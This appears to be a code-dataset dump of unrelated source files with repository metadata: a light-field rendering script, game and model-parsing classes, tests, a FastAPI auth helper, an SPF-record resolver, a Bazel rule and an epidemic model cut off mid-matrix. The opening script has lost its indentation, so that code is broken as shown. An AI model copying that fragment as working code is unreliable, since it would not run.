filenames = ["airboat","al","alfa147","cessna","cube","diamond","dodecahedron","gourd","humanoid_quad","humanoid_tri","icosahedron","lamp","magnolia","minicooper","octahedron","power_lines","roi","sandal","shuttle","skyscraper","slot_machine","teapot","tetrahedron","violin_case"]
scaleVal = [0.5,0.5,0.01,0.08,0.5,0.01,0.5,0.5,0.1,0.1,0.5,0.2,0.025,0.01,0.5,0.07,0.02,0.2,0.1,0.03,0.1,0.01,0.5,0.5]
index = 0
cameraPosOrigin = [5,1,-3]
deltaCam = 0.1
hr_image = []
lr_image = []
destination_path = "/home/sudarshan/git/OptimizationDeepLearningImageProcessing/LightFields/h5Files/"
dataset_name = "generatedLightFields"
for filename in filenames:
HRindex = 0
with imageio.get_writer(filename+"/"+filename+".gif", mode='I') as writer:
for indx in range(-2,3):
for indy in range(-2,3):
cwd = os.getcwd()
directory = cwd+"/"+filename+"/"
if not os.path.exists(directory):
os.makedirs(directory)
cameraPos = [5, cameraPosOrigin[1]+indx*deltaCam,cameraPosOrigin[2]+indy*deltaCam]
XMLstring = createXMLstring(filename,str(scaleVal[index]),str(cameraPos[1]),str(cameraPos[2]))
with open(directory+filename+str(indx)+str(indy)+".xml", "w") as cube_xml:
cube_xml.write(XMLstring)
cmd = ["mitsuba", filename+"/"+filename+str(indx)+str(indy)+".xml"]
cmd_out = subprocess.check_output(cmd)
image = imageio.imread(filename+"/"+filename+str(indx)+str(indy)+".png")
hr_image.append(np.asarray(image))
HRindex = HRindex+1
if indx == 0 and indy == 0:
lr_image.append(np.asarray(image))
writer.append_data(image)
print(["Completed index: "+str(index)])
index = index+1
create_h5(data = lr_image, label = hr_image, path = destination_path, file_name = dataset_name+"training.h5")
print("data of length ", len(lr_image), "and label of length ", len(hr_image))
| 47.027027
| 280
| 0.72069
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 788
| 0.226437
|
a1ee7d9e488784cc542ed9f4aaf3c9cd7f803d7f
| 3,001
|
py
|
Python
|
_old/test.py
|
DanielRabl/libtw2
|
ebcc833aa418e0ee25ff1da2881f7102dc7efa5d
|
[
"Apache-2.0",
"MIT"
] | 30
|
2017-07-21T19:05:07.000Z
|
2022-01-14T16:24:53.000Z
|
_old/test.py
|
DanielRabl/libtw2
|
ebcc833aa418e0ee25ff1da2881f7102dc7efa5d
|
[
"Apache-2.0",
"MIT"
] | 50
|
2017-11-20T16:43:05.000Z
|
2022-03-02T21:37:45.000Z
|
_old/test.py
|
DanielRabl/libtw2
|
ebcc833aa418e0ee25ff1da2881f7102dc7efa5d
|
[
"Apache-2.0",
"MIT"
] | 12
|
2017-07-21T19:05:10.000Z
|
2021-04-09T20:22:58.000Z
|
import datafile
from collections import defaultdict
def check_versions(df):
result = []
if len(df.types[0]) < 1:
result.append('no version')
return result
if len(df.types[0]) > 1:
result.append('multiple versions')
try:
version = df.types[0][0]
except IndexError:
result.append('version id not 1')
return result
if len(version.data) < 1:
result.append('version too small')
return result
if len(version.data) > 1:
result.append('version bigger than expected')
if version.data[0] != 1:
result.append('version not 1')
result.append(version.data[0])
return result
#struct CMapItemImage_v1
#{
# int m_Version;
# int m_Width;
# int m_Height;
# int m_External;
# int m_ImageName;
# int m_ImageData;
#} ;
#struct CMapItemImage : public CMapItemImage_v1
#{
# enum { CURRENT_VERSION=2 };
# int m_Format;
#};
def check_images(df):
for image_item in df.types[2]:
if 0 <= image_item.data[3] <= 1:
if image_item.data[3]:
continue
else:
print(df)
                pass  # print("<what?>")
print(image_item.data[3])
name_index = image_item.data[4]
try:
name = df.data[name_index]
except datafile.DatafileDataUncompressError:
name = "<none>"
#print(name)
return []
def main():
import argparse
p = argparse.ArgumentParser()
p.add_argument('filenames', metavar="DATAFILE", type=str, nargs='+', help="a datafile to be processed")
p.add_argument('-s', '--summary', action='store_true', help="show summary")
p.add_argument('-i', '--images', action='store_true', help="extract information about images")
p.add_argument('-v', '--versions', action='store_true', help="extract information about versions")
args = p.parse_args()
tasks = []
if args.images:
tasks.append('images')
if args.versions:
tasks.append('versions')
do_tasks = {'images': check_images, 'versions': check_versions}
results = {}
for task in tasks:
results[task] = defaultdict(lambda: set())
errors = defaultdict(lambda: set())
versions = defaultdict(lambda: set())
images = defaultdict(lambda: set())
for filename in args.filenames:
true_filename = filename
filename = filename.encode('utf-8', errors='ignore').decode('utf-8')
try:
df = datafile.Datafile(true_filename)
except datafile.DatafileError as e:
errors[e.__class__].add(filename)
print("{}: {}".format(filename, repr(e)))
else:
try:
for task in tasks:
for result in do_tasks[task](df):
results[task][result].add(filename)
finally:
df.close()
if args.summary:
print()
print("Error statistics:")
for err, filenames in errors.items():
print("### {}: {}, {}".format(err.__name__, len(filenames), " ".join(sorted(filenames))))
print()
print("Results:")
for task, result in results.items():
print("# {}:".format(task))
for desc, filenames in sorted(result.items(), key=lambda x: len(x[1]), reverse=True):
print("### {}: {}, {}".format(desc, len(filenames), " ".join(sorted(filenames)[:20])))
if __name__ == '__main__':
import sys
sys.exit(main())
| 25.008333
| 104
| 0.673775
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 741
| 0.246918
|
a1ee7de4317afbc181dee20858eea2b69d2fac4c
| 5,414
|
py
|
Python
|
tests/test_rotate_3dmarkers.py
|
CRBS/etspecutil
|
d0b42730545cbf04e0cb222a40845e19ff9ee3f0
|
[
"OLDAP-2.6",
"Python-2.0"
] | null | null | null |
tests/test_rotate_3dmarkers.py
|
CRBS/etspecutil
|
d0b42730545cbf04e0cb222a40845e19ff9ee3f0
|
[
"OLDAP-2.6",
"Python-2.0"
] | null | null | null |
tests/test_rotate_3dmarkers.py
|
CRBS/etspecutil
|
d0b42730545cbf04e0cb222a40845e19ff9ee3f0
|
[
"OLDAP-2.6",
"Python-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_rotate_3dmarkers
----------------------------------
Tests for `rotate_3dmarkers` module.
"""
import sys
import unittest
import os.path
import tempfile
import shutil
import logging
from etspecutil.marker import MarkersList
from etspecutil.marker import MarkersFrom3DMarkersFileFactory
from etspecutil import rotate_3dmarkers
from etspecutil.rotate_3dmarkers import Parameters
class TestRotate3DMarkers(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_setup_logging(self):
theargs = Parameters()
theargs.loglevel = 'DEBUG'
rotate_3dmarkers._setup_logging(theargs)
self.assertEqual(rotate_3dmarkers.logger.getEffectiveLevel(),
logging.DEBUG)
theargs.loglevel = 'INFO'
rotate_3dmarkers._setup_logging(theargs)
self.assertEqual(rotate_3dmarkers.logger.getEffectiveLevel(),
logging.INFO)
theargs.loglevel = 'WARNING'
rotate_3dmarkers._setup_logging(theargs)
self.assertEqual(rotate_3dmarkers.logger.getEffectiveLevel(),
logging.WARNING)
theargs.loglevel = 'ERROR'
rotate_3dmarkers._setup_logging(theargs)
self.assertEqual(rotate_3dmarkers.logger.getEffectiveLevel(),
logging.ERROR)
theargs.loglevel = 'CRITICAL'
rotate_3dmarkers._setup_logging(theargs)
self.assertEqual(rotate_3dmarkers.logger.getEffectiveLevel(),
logging.CRITICAL)
def test_parse_arguments(self):
theargs = rotate_3dmarkers._parse_arguments('hi', ['foo'])
self.assertEqual(theargs.markerfile, 'foo')
self.assertEqual(theargs.outfile, None)
self.assertEqual(theargs.angle, 90)
self.assertEqual(theargs.width, 1080)
self.assertEqual(theargs.height, 1080)
self.assertEqual(theargs.loglevel, 'WARNING')
targs = rotate_3dmarkers._parse_arguments('hi', ['--angle', '45',
'--outfile', 'out',
'--width', '10',
'--height', '20',
'--log', 'DEBUG',
'foo2'])
self.assertEqual(targs.markerfile, 'foo2')
self.assertEqual(targs.outfile, 'out')
self.assertEqual(targs.angle, 45)
self.assertEqual(targs.width, 10)
self.assertEqual(targs.height, 20)
self.assertEqual(targs.loglevel, 'DEBUG')
def test_rotate_markers_file_outfile_set_to_none(self):
temp_dir = tempfile.mkdtemp()
try:
markerfile = os.path.join(temp_dir, '3Dmarkers.txt')
markers = MarkersList()
markers.add_marker(1, 2, 3, 4)
markers.write_markers_to_file(markerfile)
theargs = Parameters()
theargs.outfile = None
theargs.angle = 90
theargs.width = 10
theargs.height = 10
theargs.markerfile = markerfile
rotate_3dmarkers.rotate_markers_file(theargs)
origfile = markerfile + '.orig'
self.assertTrue(os.path.isfile(origfile))
fac = MarkersFrom3DMarkersFileFactory(origfile)
markers = fac.get_markerslist()
m = markers.get_markers()[0]
self.assertEqual(m.get_index(), 1)
self.assertEqual(m.get_x(), 2)
self.assertEqual(m.get_y(), 3)
self.assertEqual(m.get_z(), 4)
self.assertTrue(os.path.isfile(markerfile))
fac = MarkersFrom3DMarkersFileFactory(markerfile)
markers = fac.get_markerslist()
m = markers.get_markers()[0]
self.assertEqual(m.get_index(), 1)
self.assertEqual(m.get_x(), 7)
self.assertEqual(m.get_y(), 2)
self.assertEqual(m.get_z(), 4)
finally:
shutil.rmtree(temp_dir)
def test_rotate_markers_file_outfile_set(self):
temp_dir = tempfile.mkdtemp()
try:
markerfile = os.path.join(temp_dir, '3Dmarkers.txt')
markers = MarkersList()
markers.add_marker(1, 2, 3, 4)
markers.write_markers_to_file(markerfile)
outfile = os.path.join(temp_dir, 'out')
theargs = Parameters()
theargs.outfile = outfile
theargs.angle = 90
theargs.width = 10
theargs.height = 10
theargs.markerfile = markerfile
rotate_3dmarkers.rotate_markers_file(theargs)
self.assertTrue(os.path.isfile(markerfile))
fac = MarkersFrom3DMarkersFileFactory(outfile)
markers = fac.get_markerslist()
m = markers.get_markers()[0]
self.assertEqual(m.get_index(), 1)
self.assertEqual(m.get_x(), 7)
self.assertEqual(m.get_y(), 2)
self.assertEqual(m.get_z(), 4)
finally:
shutil.rmtree(temp_dir)
def test_main(self):
try:
rotate_3dmarkers.main()
self.fail('Expected OSError')
except OSError:
pass
if __name__ == '__main__':
sys.exit(unittest.main())
| 35.155844
| 76
| 0.579424
| 4,919
| 0.90857
| 0
| 0
| 0
| 0
| 0
| 0
| 376
| 0.06945
|
a1efd6d129721046eb1d2381c5f7945eeeb81f90
| 431
|
py
|
Python
|
tests/conftest.py
|
asvetlov/aiohttp_mako
|
8fb66bd35b8cb4a2fa91e33f3dff918e4798a15a
|
[
"Apache-2.0"
] | 24
|
2016-12-25T16:24:45.000Z
|
2020-04-07T14:39:28.000Z
|
tests/conftest.py
|
jettify/aiohttp_mako
|
8fb66bd35b8cb4a2fa91e33f3dff918e4798a15a
|
[
"Apache-2.0"
] | 168
|
2016-11-12T20:50:34.000Z
|
2022-03-18T02:09:08.000Z
|
tests/conftest.py
|
jettify/aiohttp_mako
|
8fb66bd35b8cb4a2fa91e33f3dff918e4798a15a
|
[
"Apache-2.0"
] | 9
|
2016-12-13T10:48:26.000Z
|
2020-09-17T10:42:40.000Z
|
import sys
import pytest
import aiohttp_mako
from aiohttp import web
@pytest.fixture
def app():
app = web.Application()
lookup = aiohttp_mako.setup(app, input_encoding='utf-8',
output_encoding='utf-8',
default_filters=['decode.utf8'])
tplt = "<html><body><h1>${head}</h1>${text}</body></html>"
lookup.put_string('tplt.html', tplt)
return app
| 22.684211
| 64
| 0.584687
| 0
| 0
| 0
| 0
| 357
| 0.828306
| 0
| 0
| 89
| 0.206497
|
a1f3d906821dbcf88254a5e1e8e69f73b13693e7
| 3,583
|
py
|
Python
|
CraftMasterGame/src/enemy.py
|
Athelios/CraftMaster
|
636cc60681d3199b3ae685690ee427fe81672541
|
[
"MIT"
] | null | null | null |
CraftMasterGame/src/enemy.py
|
Athelios/CraftMaster
|
636cc60681d3199b3ae685690ee427fe81672541
|
[
"MIT"
] | null | null | null |
CraftMasterGame/src/enemy.py
|
Athelios/CraftMaster
|
636cc60681d3199b3ae685690ee427fe81672541
|
[
"MIT"
] | null | null | null |
from npc import *
import math
from pyglet import image
from pyglet.graphics import TextureGroup
import os
import json
class Enemy(Npc):
def __init__(self, world, position, health, dy=0, walkSpeed=5, flying=False, flySpeed=10, height=1, jumpHeight=1.0):
super(Enemy, self).__init__(world, position, health, dy, walkSpeed, flying, flySpeed, height, jumpHeight)
self.model = self.createModel(world)
self.rotateSelfY(-math.pi/2)
with open(os.path.join('animation', 'enemy.anim'), 'r') as file:
self.animation = json.load(file)
self.frames = [0, 0, 0]
self.attacking = False
def createModel(self, world):
texture0 = TextureGroup(image.load(os.path.join("texture", "zombie0.png")).get_texture())
texture1 = TextureGroup(image.load(os.path.join("texture", "zombie1.png")).get_texture())
x, y, z = self.position
cube1 = createCube(world, texture0, x + 0.15, y + 0.15, z, 0.29, 0.7, 0.25)
cube2 = createCube(world, texture0, x - 0.15, y + 0.15, z, 0.29, 0.7, 0.25)
cube3 = createCube(world, texture0, x, y + 0.8, z, 0.6, 0.7, 0.3)
cube4 = createCube(world, texture0, x + 0.4, y + 0.8, z, 0.2, 0.7, 0.2)
cube5 = createCube(world, texture0, x - 0.4, y + 0.8, z, 0.2, 0.7, 0.2)
cube6 = createCube(world, texture1, x, y + 1.3, z, 0.5, 0.5, 0.5)
model = [cube1, cube2, cube3, cube4, cube5, cube6]
return model
def ai(self, world):
if 2 < self.distanceTo(world.player) < 20:
self.goal = list(world.player.position)
self.goal = (int(round(self.goal[0])), int(round(self.goal[1])) - 1, int(round(self.goal[2])))
if self.counter % 20 == 0:
self.navigation.navigate()
elif self.distanceTo(world.player) <= 2:
self.goal = None
if self.energy == 100:
self.attack(world.player)
else:
self.goal = None
def attack(self, player):
vector = [10*(player.position[0] - self.position[0]), 10*(player.position[2] - self.position[2]), 10]
player.hit(vector)
self.attacking = True
self.energy = 0
def update(self, dt, world):
if not self.stunned:
self.ai(world)
if self.goal:
self.navigate()
else:
if self.stunned == 1:
self.goal = list(self.world.player.position)
self.navigation.navigate()
delta = [self.position[0] - self.lastPosition[0], self.position[1] - self.lastPosition[1], self.position[2] - self.lastPosition[2]]
for shape in self.model:
for part in shape:
for i in range(0, len(part.vertices), 3):
part.vertices[i] += delta[0]
part.vertices[i + 1] += delta[1]
part.vertices[i + 2] += delta[2]
walk = delta[0] != 0 or delta[2] != 0
self.walking = self.walking or walk
if self.distanceTo(world.player) <= 3:
delta = [world.player.position[0] - self.position[0], world.player.position[1] - self.position[1], world.player.position[2] - self.position[2]]
theta = self.angle(self.sight, [delta[0], delta[2]])
if delta[0] != 0 or delta[2] != 0:
self.rotateSelfY(theta)
self.sight = [delta[0], delta[2]]
self.lastPosition = list(self.position)
self.counter += 1
self.energy = min(self.energy + 2, 100)
self.animate()
super(Enemy, self).update(dt, world)
| 42.654762
| 155
| 0.568518
| 3,462
| 0.966229
| 0
| 0
| 0
| 0
| 0
| 0
| 70
| 0.019537
|
a1f67693d5e8c244c0eda84f1334ad34e26d18f3
| 754
|
py
|
Python
|
goldsrc/mdl/structs/bodypart.py
|
half5life/SourceIO
|
f3dc6db92daa537acbb487ce09f371866f6e3e7f
|
[
"MIT"
] | 1
|
2021-07-12T12:55:27.000Z
|
2021-07-12T12:55:27.000Z
|
goldsrc/mdl/structs/bodypart.py
|
half5life/SourceIO
|
f3dc6db92daa537acbb487ce09f371866f6e3e7f
|
[
"MIT"
] | null | null | null |
goldsrc/mdl/structs/bodypart.py
|
half5life/SourceIO
|
f3dc6db92daa537acbb487ce09f371866f6e3e7f
|
[
"MIT"
] | null | null | null |
from typing import List
from .model import StudioModel
from ....source_shared.base import Base
from ....utilities.byte_io_mdl import ByteIO
class StudioBodypart(Base):
def __init__(self):
self.name = ''
self.model_count = 0
self.base = 0
self.model_offset = 0
self.models: List[StudioModel] = []
def read(self, reader: ByteIO):
self.name = reader.read_ascii_string(64)
(self.model_count, self.base, self.model_offset) = reader.read_fmt('3i')
with reader.save_current_pos():
reader.seek(self.model_offset)
for _ in range(self.model_count):
model = StudioModel()
model.read(reader)
self.models.append(model)
| 30.16
| 80
| 0.619363
| 610
| 0.809019
| 0
| 0
| 0
| 0
| 0
| 0
| 6
| 0.007958
|
a1f747225cd20292d907c35e437ba676e03d1874
| 511
|
py
|
Python
|
app/core/auth.py
|
oxfn/owtest
|
f4eeae225ef67684d96edd5708c44a0fd639d037
|
[
"Unlicense"
] | null | null | null |
app/core/auth.py
|
oxfn/owtest
|
f4eeae225ef67684d96edd5708c44a0fd639d037
|
[
"Unlicense"
] | null | null | null |
app/core/auth.py
|
oxfn/owtest
|
f4eeae225ef67684d96edd5708c44a0fd639d037
|
[
"Unlicense"
] | null | null | null |
from fastapi import Depends
from fastapi.exceptions import HTTPException
from fastapi.security import OAuth2PasswordBearer
from app.models.users import User, UserRepository
get_token = OAuth2PasswordBearer(tokenUrl="/login")
async def get_user(
token: str = Depends(get_token), users: UserRepository = Depends()
) -> User:
"""Get current authenticated user."""
user = await users.get(token=token)
if user:
return user
raise HTTPException(status_code=403, detail="Invalid token")
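
# ---------------------------------------------------------------------------
# Illustrative usage sketch (editor addition): how `get_user` is typically
# consumed as a route dependency. The router, path, and handler below are
# assumptions for demonstration only; `get_user` and `User` come from above.
from fastapi import APIRouter

example_router = APIRouter()  # hypothetical router, not wired into the real app


@example_router.get("/me")
async def read_current_user(user: User = Depends(get_user)):
    """Return the user resolved from the bearer token, or fail with 403."""
    return user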
| 28.388889
| 70
| 0.749511
| 0
| 0
| 0
| 0
| 0
| 0
| 281
| 0.549902
| 60
| 0.117417
|
a1f94bf8941a2359311bcdccf3b7596591d7d459
| 1,449
|
py
|
Python
|
hard-gists/4471462/snippet.py
|
jjhenkel/dockerizeme
|
eaa4fe5366f6b9adf74399eab01c712cacaeb279
|
[
"Apache-2.0"
] | 21
|
2019-07-08T08:26:45.000Z
|
2022-01-24T23:53:25.000Z
|
hard-gists/4471462/snippet.py
|
jjhenkel/dockerizeme
|
eaa4fe5366f6b9adf74399eab01c712cacaeb279
|
[
"Apache-2.0"
] | 5
|
2019-06-15T14:47:47.000Z
|
2022-02-26T05:02:56.000Z
|
hard-gists/4471462/snippet.py
|
jjhenkel/dockerizeme
|
eaa4fe5366f6b9adf74399eab01c712cacaeb279
|
[
"Apache-2.0"
] | 17
|
2019-05-16T03:50:34.000Z
|
2021-01-14T14:35:12.000Z
|
#!/usr/bin/env python
#
# Author: Fred C.
# Email:
#
from __future__ import print_function
from collections import defaultdict
import sys
import DNS
import re
RE_PARSE = re.compile(r'(ip4|ip6|include|redirect)[:=](.*)', re.IGNORECASE)
MAX_RECURSION = 5
def dns_txt(domain):
try:
resp = DNS.dnslookup(domain, 'TXT')
except DNS.ServerError as err:
print(err, file=sys.stderr)
return None
response = []
for r in resp:
response.append(''.join(r))
return response
def dns_parse(txt_field):
resp = defaultdict(set)
for rec in txt_field:
fields = rec.split()
for field in fields:
match = RE_PARSE.match(field)
if match:
resp[match.group(1)].add(match.group(2))
return resp
def process(domain):
domains = [domain]
ip_addresses = set()
for cnt in range(MAX_RECURSION):
includes = set()
for dom in domains:
txt = dns_txt(dom)
if not txt:
continue
spf = dns_parse(txt)
ip_addresses |= spf.get('ip4', set())
ip_addresses |= spf.get('ip6', set())
includes |= spf.get('include', set())
includes |= spf.get('redirect', set())
if not includes:
break
domains = includes
return ip_addresses
if __name__ == '__main__':
whitelist = set()
with open(sys.argv[1]) as fd:
for line in fd:
line = line.strip()
for ip in process(line):
whitelist.add(ip)
for ip in sorted(whitelist):
print(ip)
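
# ---------------------------------------------------------------------------
# Illustrative sketch (editor addition): what dns_parse() extracts from a raw
# SPF TXT record. The record below is made up (documentation IP range), not
# taken from a real domain.
# >>> dns_parse(['v=spf1 ip4:192.0.2.0/24 include:_spf.example.com ~all'])
# defaultdict(<class 'set'>, {'ip4': {'192.0.2.0/24'},
#                             'include': {'_spf.example.com'}})
# process() then recurses into every include/redirect (at most MAX_RECURSION
# levels) and returns the union of all ip4/ip6 entries it finds.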
| 21.308824
| 75
| 0.63285
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 131
| 0.090407
|
a1f99eeded3cabb05a888e2acb13ce873a05d09f
| 895
|
bzl
|
Python
|
tools/build_rules/cc_resources.bzl
|
justbuchanan/kythe
|
91da8b42354cd3b6818be5a9bf4389fd144ff6e5
|
[
"Apache-2.0"
] | null | null | null |
tools/build_rules/cc_resources.bzl
|
justbuchanan/kythe
|
91da8b42354cd3b6818be5a9bf4389fd144ff6e5
|
[
"Apache-2.0"
] | null | null | null |
tools/build_rules/cc_resources.bzl
|
justbuchanan/kythe
|
91da8b42354cd3b6818be5a9bf4389fd144ff6e5
|
[
"Apache-2.0"
] | null | null | null |
def cc_resources(name, data):
out_inc = name + ".inc"
cmd = ('echo "static const struct FileToc kPackedFiles[] = {" > $(@); \n' +
"for j in $(SRCS); do\n" +
' echo "{\\"$$(basename "$${j}")\\"," >> $(@);\n' +
' echo "R\\"filecontent($$(< $${j}))filecontent\\"" >> $(@);\n' +
' echo "}," >> $(@);\n' +
"done &&\n" +
'echo "{nullptr, nullptr}};" >> $(@)')
if len(data) == 0:
fail("Empty `data` attribute in `%s`" % name)
native.genrule(
name = name,
outs = [out_inc],
srcs = data,
cmd = cmd,
)
# Returns the generated files directory root.
#
# Note: workaround for https://github.com/bazelbuild/bazel/issues/4463.
def gendir():
if native.repository_name() == "@":
return "$(GENDIR)"
return "$(GENDIR)/external/" + native.repository_name().lstrip("@")
| 34.423077
| 79
| 0.484916
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 469
| 0.524022
|
a1fa4d83464708be7267466fae9107d6a82954d1
| 32,249
|
py
|
Python
|
modelling/model_seiihurd_matrices.py
|
lhunlindeion/Mathematical-and-Statistical-Modeling-of-COVID19-in-Brazil
|
164f19fcf04fe391aa7515fe436c63c6534fa89c
|
[
"MIT"
] | 37
|
2020-03-28T16:36:56.000Z
|
2021-11-16T11:34:55.000Z
|
modelling/model_seiihurd_matrices.py
|
lhunlindeion/Mathematical-and-Statistical-Modeling-of-COVID19-in-Brazil
|
164f19fcf04fe391aa7515fe436c63c6534fa89c
|
[
"MIT"
] | 1
|
2020-05-29T16:39:03.000Z
|
2020-06-01T19:29:55.000Z
|
modelling/model_seiihurd_matrices.py
|
lhunlindeion/Mathematical-and-Statistical-Modeling-of-COVID19-in-Brazil
|
164f19fcf04fe391aa7515fe436c63c6534fa89c
|
[
"MIT"
] | 9
|
2020-03-28T00:00:16.000Z
|
2021-02-19T14:41:47.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue May 19 18:08:01 2020
@author: Felipe A. C. Pereira
Implementation of the SEIIHURD model fit with group separation. It still needs
more checks and helper functions to simplify the input. Based on the classes
available in modelos.py.
"""
import numpy as np
from functools import reduce
import scipy.integrate as spi
from scipy.optimize import least_squares
from platypus import NSGAII, Problem, Real
from pyswarms.single.global_best import GlobalBestPSO
import pyswarms as ps
from pyswarms.backend.topology import Star
from pyswarms.utils.plotters import plot_cost_history
from itertools import repeat
import multiprocessing as mp
import copy
import joblib
'''
Social contact matrices from
PREM, Kiesha; COOK, Alex R.; JIT, Mark. Projecting social contact matrices in
152 countries using contact surveys and demographic data. PLoS computational
biology, v. 13, n. 9, p. e1005697, 2017.
'''
ages_Mu_min = 5 * np.arange(16)
Mu_house = np.array([[0.47868515, 0.50507561, 0.29848922, 0.15763748, 0.26276959,
0.40185462, 0.46855027, 0.42581354, 0.2150961 , 0.0856771 ,
0.08705463, 0.07551931, 0.05129175, 0.02344832, 0.00793644,
0.01072846],
[0.35580205, 0.77874482, 0.51392686, 0.21151069, 0.08597966,
0.28306027, 0.49982218, 0.52854893, 0.41220947, 0.15848728,
0.07491245, 0.07658339, 0.04772343, 0.02588962, 0.01125956,
0.01073152],
[0.25903114, 0.63488713, 1.36175618, 0.50016515, 0.11748191,
0.10264613, 0.24113458, 0.47274372, 0.54026417, 0.26708819,
0.11007723, 0.04406045, 0.02746409, 0.02825033, 0.02044872,
0.01214665],
[0.14223192, 0.24383932, 0.53761638, 1.05325205, 0.28778496,
0.10925453, 0.0651564 , 0.2432454 , 0.39011334, 0.41381277,
0.23194909, 0.07541471, 0.03428398, 0.02122257, 0.01033573,
0.00864859],
[0.27381886, 0.15430529, 0.16053062, 0.5104134 , 0.95175366,
0.3586594 , 0.09248672, 0.04774269, 0.15814197, 0.36581739,
0.25544811, 0.13338965, 0.03461345, 0.01062458, 0.00844199,
0.00868782],
[0.59409802, 0.26971847, 0.10669146, 0.18330524, 0.39561893,
0.81955947, 0.26376865, 0.06604084, 0.03824556, 0.11560004,
0.23218163, 0.15331788, 0.07336147, 0.02312255, 0.00412646,
0.01025778],
[0.63860889, 0.75760606, 0.43109156, 0.09913293, 0.13935789,
0.32056062, 0.65710277, 0.25488454, 0.1062129 , 0.0430932 ,
0.06880784, 0.09938458, 0.09010691, 0.02233902, 0.01155556,
0.00695246],
[0.56209348, 0.87334544, 0.75598244, 0.33199136, 0.07233271,
0.08674171, 0.20243583, 0.60062714, 0.17793601, 0.06307045,
0.04445926, 0.04082447, 0.06275133, 0.04051762, 0.01712777,
0.00598721],
[0.35751289, 0.66234582, 0.77180208, 0.54993616, 0.17368099,
0.07361914, 0.13016852, 0.19937327, 0.46551558, 0.15412263,
0.06123041, 0.0182514 , 0.04234381, 0.04312892, 0.01656267,
0.01175358],
[0.208131 , 0.41591452, 0.56510014, 0.67760241, 0.38146504,
0.14185001, 0.06160354, 0.12945701, 0.16470166, 0.41150841,
0.14596804, 0.04404807, 0.02395316, 0.01731295, 0.01469059,
0.02275339],
[0.30472548, 0.26744442, 0.41631962, 0.46516888, 0.41751365,
0.28520772, 0.13931619, 0.07682945, 0.11404965, 0.16122096,
0.33813266, 0.1349378 , 0.03755396, 0.01429426, 0.01356763,
0.02551792],
[0.52762004, 0.52787011, 0.33622117, 0.43037934, 0.36416323,
0.42655672, 0.33780201, 0.13492044, 0.0798784 , 0.15795568,
0.20367727, 0.33176385, 0.12256126, 0.05573807, 0.0124446 ,
0.02190564],
[0.53741472, 0.50750067, 0.3229994 , 0.30706704, 0.21340314,
0.27424513, 0.32838657, 0.26023515, 0.13222548, 0.07284901,
0.11950584, 0.16376401, 0.25560123, 0.09269703, 0.02451284,
0.00631762],
[0.37949376, 0.55324102, 0.47449156, 0.24796638, 0.19276924,
0.20675484, 0.3267867 , 0.39525729, 0.3070043 , 0.10088992,
0.10256839, 0.13016641, 0.1231421 , 0.24067708, 0.05475668,
0.01401368],
[0.16359554, 0.48536065, 0.40533723, 0.31542539, 0.06890518,
0.15670328, 0.12884062, 0.27912381, 0.25685832, 0.20143856,
0.12497647, 0.07565566, 0.10331686, 0.08830789, 0.15657321,
0.05744065],
[0.29555039, 0.39898035, 0.60257982, 0.5009724 , 0.13799378,
0.11716593, 0.14366306, 0.31602298, 0.34691652, 0.30960511,
0.31253708, 0.14557295, 0.06065554, 0.10654772, 0.06390924,
0.09827735]])
Mu_school = np.array([[3.21885854e-001, 4.31659966e-002, 7.88269419e-003,
8.09548363e-003, 5.35038146e-003, 2.18201974e-002,
4.01633514e-002, 2.99376002e-002, 1.40680283e-002,
1.66587853e-002, 9.47774696e-003, 7.41041622e-003,
1.28200661e-003, 7.79120405e-004, 8.23608272e-066,
6.37926405e-120],
[5.40133328e-002, 4.84870697e+000, 2.70046494e-001,
3.14778450e-002, 3.11206331e-002, 8.56826951e-002,
1.08251879e-001, 9.46101139e-002, 8.63528188e-002,
5.51141159e-002, 4.19385198e-002, 1.20958942e-002,
4.77242219e-003, 1.39787217e-003, 3.47452943e-004,
8.08973738e-039],
[4.56461982e-004, 1.04840235e+000, 6.09152459e+000,
1.98915822e-001, 1.99709921e-002, 6.68319525e-002,
6.58949586e-002, 9.70851505e-002, 9.54147078e-002,
6.70538232e-002, 4.24864096e-002, 1.98701346e-002,
5.11869429e-003, 7.27320438e-004, 4.93746124e-025,
1.82153965e-004],
[2.59613205e-003, 4.73315233e-002, 1.99337834e+000,
7.20040500e+000, 8.57326037e-002, 7.90668822e-002,
8.54208542e-002, 1.10816964e-001, 8.76955236e-002,
9.22975521e-002, 4.58035025e-002, 2.51130956e-002,
5.71391798e-003, 1.07818752e-003, 6.21174558e-033,
1.70710246e-070],
[7.19158720e-003, 2.48833195e-002, 9.89727235e-003,
8.76815025e-001, 4.33963352e-001, 5.05185217e-002,
3.30594492e-002, 3.81384107e-002, 2.34709676e-002,
2.67235372e-002, 1.32913985e-002, 9.00655556e-003,
6.94913059e-004, 1.25675951e-003, 1.77164197e-004,
1.21957619e-047],
[7.04119204e-003, 1.19412206e-001, 3.75016980e-002,
2.02193056e-001, 2.79822908e-001, 1.68610223e-001,
2.86939363e-002, 3.56961469e-002, 4.09234494e-002,
3.32290896e-002, 8.12074348e-003, 1.26152144e-002,
4.27869081e-003, 2.41737477e-003, 4.63116893e-004,
1.28597237e-003],
[1.41486320e-002, 3.86561429e-001, 2.55902236e-001,
1.69973534e-001, 4.98104010e-002, 8.98122446e-002,
7.95333394e-002, 5.19274611e-002, 5.46612930e-002,
2.64567137e-002, 2.03241595e-002, 2.96263220e-003,
5.42888613e-003, 4.47585970e-004, 1.65440335e-048,
3.11189454e-055],
[2.40945305e-002, 2.11030046e-001, 1.54767246e-001,
8.17929897e-002, 1.84061608e-002, 5.43009779e-002,
7.39351186e-002, 5.21677009e-002, 5.63267084e-002,
2.51807147e-002, 3.53972554e-003, 7.96646343e-003,
5.56929776e-004, 2.08530461e-003, 1.84428290e-123,
9.69555083e-067],
[7.81313905e-003, 1.14371898e-001, 9.09011945e-002,
3.80212104e-001, 8.54533192e-003, 2.62430162e-002,
2.51880009e-002, 3.22563508e-002, 6.73506045e-002,
2.24997143e-002, 2.39241043e-002, 6.50627191e-003,
5.50892674e-003, 4.78308850e-004, 4.81213215e-068,
2.40231425e-092],
[6.55265016e-002, 2.31163536e-001, 1.49970765e-001,
5.53563093e-001, 5.74032526e-003, 3.02865481e-002,
